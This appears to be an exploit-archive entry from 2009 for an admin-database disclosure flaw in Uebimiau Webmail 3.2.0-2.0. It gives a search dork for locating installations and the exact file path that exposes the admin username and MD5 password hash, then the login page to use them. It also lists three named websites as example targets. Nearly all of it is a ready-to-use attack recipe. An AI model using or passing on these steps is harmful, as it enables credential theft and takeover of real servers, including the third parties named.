[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Uebimiau Webmail 3.2.0-2.0 Arbitrary Database Disclosure Vuln
# Published : 2009-08-24
# Author : Septemb0x
# Previous Title : Lanai Core 0.6 Remote File Disclosure / Info Disclosure Vulns
# Next Title : humanCMS (Auth Bypass) SQL Injection Vulnerability
##################################################
[+]Script Name : Uebimiau Webmail v3.2.0-2.0
[+]Bug Type : Arbitrary Admins Database Disclosure Vulnerability
[+]D0rk : "Uebimiau Webmail v3.2.0-2.0"
[+]Author : Septemb0x
[+]Greetz : BHDR & BARCOD3 & MUHADRAM - Thanks : www.gonulerleri.org
[+]Note : T??m M??sl??man Camias?±na Hay?±rl?± Ramazanlar Dilerim...
##################################################
[+]Examples :
1. http://ifcacareer.com/mail/inc/database/system_admin/admin.ucf
2. http://krunt.org/webmail/inc/database/system_admin/admin.ucf
3. http://www.hostsalive.com/webmail/inc/database/system_admin/admin.ucf
##################################################
[+]EXPLOIT ; http://[Target]/[path]/inc/database/system_admin/admin.ucf
[+]GET ; username:password(md5)
[+]LOGIN ; http://[Target]/[path]/admin/login.php
##################################################
# www.Syue.com [2009-08-24]